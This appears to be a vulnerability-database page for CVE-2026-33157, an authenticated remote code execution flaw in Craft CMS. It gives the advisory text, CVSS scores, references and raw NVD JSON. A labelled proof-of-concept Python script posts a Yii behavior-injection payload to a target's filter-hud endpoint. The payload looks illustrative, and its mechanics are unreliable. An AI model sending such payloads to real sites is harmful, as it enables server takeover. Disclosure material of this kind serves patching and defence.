CVE-2026-33157

Description

Craft CMS is a content management system (CMS). From version 5.6.0 to before version 5.9.13, a Remote Code Execution (RCE) vulnerability exists in Craft CMS, it can be exploited by any authenticated user with control panel access. This is a bypass of a previous fix. The existing patches add cleanseConfig() to assembleLayoutFromPost() and various FieldsController actions to strip Yii2 behavior/event injection keys ("as" and "on" prefixed keys). However, the fieldLayouts parameter in ElementIndexesController::actionFilterHud() is passed directly to FieldLayout::createFromConfig() without any sanitization, enabling the same behavior injection attack chain. This issue has been patched in version 5.9.13.

CVSS Details

CVSS Score

7.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:* - VULNERABLE

Craft CMS >= 5.6.0, < 5.9.13

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Exploit concept for CVE-2026-33157
# Target: Craft CMS < 5.9.13
# Requirement: Authenticated Session

target_url = "https://target-craft.com/admin/element-indexes/filter-hud"
session_cookie = "{PHPSESSID_COOKIE_VALUE}"

# Payload structure demonstrating behavior injection via 'as' key
payload = {
    "fieldLayouts": {
        "uid": "test-layout",
        "as": {
            "class": "yii\\base\\Object",  # Malicious class instantiation
            "__construct()": [
                ["whoami"]  # Arbitrary command argument
            ]
        }
    }
}

headers = {
    "Cookie": f"PHPSESSID={session_cookie}",
    "Content-Type": "application/json"
}

response = requests.post(target_url, json=payload, headers=headers)
print(f"Status Code: {response.status_code}")
print(f"Response: {response.text}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-33157
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-33157
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-33157/
[4] VulDB https://vuldb.com/cve/CVE-2026-33157
[5] https://github.com/craftcms/cms/commit/97e90b4bdee369c1af3ca77a77531132df240e4e
[6] https://github.com/craftcms/cms/releases/tag/5.9.13
[7] https://github.com/craftcms/cms/security/advisories/GHSA-2fph-6v5w-89hh

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-33157", "sourceIdentifier": "[email protected]", "published": "2026-03-24T18:16:09.590", "lastModified": "2026-03-26T17:08:13.740", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Craft CMS is a content management system (CMS). From version 5.6.0 to before version 5.9.13, a Remote Code Execution (RCE) vulnerability exists in Craft CMS, it can be exploited by any authenticated user with control panel access. This is a bypass of a previous fix. The existing patches add cleanseConfig() to assembleLayoutFromPost() and various FieldsController actions to strip Yii2 behavior/event injection keys (\"as\" and \"on\" prefixed keys). However, the fieldLayouts parameter in ElementIndexesController::actionFilterHud() is passed directly to FieldLayout::createFromConfig() without any sanitization, enabling the same behavior injection attack chain. This issue has been patched in version 5.9.13."}, {"lang": "es", "value": "Craft CMS es un sistema de gestión de contenido (CMS). Desde la versión 5.6.0 hasta antes de la versión 5.9.13, existe una vulnerabilidad de Ejecución Remota de Código (RCE) en Craft CMS, que puede ser explotada por cualquier usuario autenticado con acceso al panel de control. Esto es una elusión de una corrección anterior. Los parches existentes añaden cleanseConfig() a assembleLayoutFromPost() y a varias acciones de FieldsController para eliminar las claves de inyección de comportamiento/evento de Yii2 ('claves prefijadas con 'as' y 'on'). Sin embargo, el parámetro fieldLayouts en ElementIndexesController::actionFilterHud() se pasa directamente a FieldLayout::createFromConfig() sin ninguna sanitización, lo que permite la misma cadena de ataque de inyección de comportamiento. Este problema ha sido parcheado en la versión 5.9.13."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-470"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.6.0", "versionEndExcluding": "5.9.13", "matchCriteriaId": "C315EDAE-A519-409A-873A-E6D840C98A82"}]}]}], "references": [{"url": "https://github.com/craftcms/cms/commit/97e90b4bdee369c1af3ca77a77531132df240e4e", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/craftcms/cms/releases/tag/5.9.13", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/craftcms/cms/security/advisories/GHSA-2fph-6v5w-89hh", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}